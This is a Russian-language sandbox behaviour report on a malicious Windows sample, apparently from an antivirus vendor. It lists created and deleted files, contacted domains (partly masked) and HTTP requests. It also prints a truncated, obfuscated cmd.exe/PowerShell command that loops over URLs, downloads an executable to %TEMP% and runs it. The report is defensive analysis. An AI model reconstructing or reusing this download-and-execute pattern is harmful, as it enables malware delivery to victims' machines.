Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V:O/C"set NV=;'SYs'=hWN$}}{hctac}};kaerb;'zzM'=LJH$;Uam$ metI-ekovnI{ )00008 eg- htgnel.)Uam$ metI-teG(( fI;'OoB'=mfO$;)Uam$ ,kuD$(eliFdaolnwoD.sPm${yrt{)DDh$ ni kuD$(hcaerof;'exe.'+HPH$+'\'+p...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\878.exe
Удаляет следующие файлы
- %TEMP%\878.exe
Подменяет следующие файлы
- %TEMP%\878.exe
Сетевая активность
Подключается к
- 'cl###ft.cba.pl':80
- 'yo#####da-palermo.org':80
- 'wm###stoms.com':80
TCP
Запросы HTTP GET
- http://cl###ft.cba.pl/f
- http://www.yo#####da-palermo.org/Ra7
- http://www.wm###stoms.com/R
- http://www.wm###stoms.com/cgi-sys/suspendedpage.cgi
UDP
- DNS ASK cl###ft.cba.pl
- DNS ASK yo#####da-palermo.org
- DNS ASK wm###stoms.com
- DNS ASK sc#####.#ebhawksittesting.com
- DNS ASK ed#######el.marigoldcatba.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:O/C"set NV=;'SYs'=hWN$}}{hctac}};kaerb;'zzM'=LJH$;Uam$ metI-ekovnI{ )00008 eg- htgnel.)Uam$ metI-teG(( fI;'OoB'=mfO$;)Uam$ ,kuD$(eliFdaolnwoD.sPm${yrt{)DDh$ ni kuD$(hcaerof;'exe.'+HPH$+'\'+p...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' =thj
